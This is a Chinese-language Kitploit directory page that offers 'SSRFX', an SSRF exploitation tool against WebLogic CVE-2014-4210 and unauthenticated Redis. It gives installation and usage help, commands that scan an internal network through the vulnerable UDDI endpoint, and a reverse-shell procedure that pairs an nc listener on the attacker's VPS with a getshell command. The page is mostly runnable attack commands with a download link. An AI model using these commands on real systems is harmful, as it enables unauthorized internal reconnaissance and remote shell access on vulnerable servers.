Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nonenotnull/ssrfx
ReconnaissancePort ScanningVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnonenotnull/ssrfx

SSRFX

CVE-2014-4210+Redis未授权访问

查看仓库
98379年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2014-4210+Redis未授权访问

安装

root@kitploit:~
pip install -r requirements.txt

使用

root@kitploit:~
usage: SSRFX.py [-h] [--url URL] [--threads THREADS] [--app APP]
                [--network NETWORK] [--type TYPE] [--vulapp VULAPP]
                [--lhost LHOST] [--lport LPORT] [--rhost RHOST]
                [--rport RPORT]

SSRF Explotion Tools

optional arguments:
  -h, --help         show this help message and exit
  --url URL          Input the url u want to attack
  --threads THREADS  Input the threads u want to set
  --app APP          Input the website type,such as :weblogic
  --network NETWORK  The internal network to scan,network[,network[,network]]
  --type TYPE        Attack type,such as : portscan or livedetect
  --vulapp VULAPP    vulnerable app,such as redis
  --lhost LHOST      local host ip address
  --lport LPORT      local host port
  --rhost RHOST      remote host ip address
  --rport RPORT      remote host port

存活扫描:

root@kitploit:~
python SSRFX.py --url http://example.com/uddiexplorer/SearchPublicRegistries.jsp --app weblogic --network 172.16.5.0/24 --type livedetect

端口扫描:

root@kitploit:~
python SSRFX.py --url http://example.com/uddiexplorer/SearchPublicRegistries.jsp --app weblogic --network 172.16.5.0/24 --type portscan

反弹shell

远程VPS

root@kitploit:~
nc -lvp 监听端口

跳板主机

root@kitploit:~
python SSRFX.py --url http://example.com/uddiexplorer/SearchPublicRegistries.jsp --app weblogic --vulapp redis --type getshell --lhost 内网主机 --lport redis端口 --rhost 远程主机 --rport 监听端口
下载工具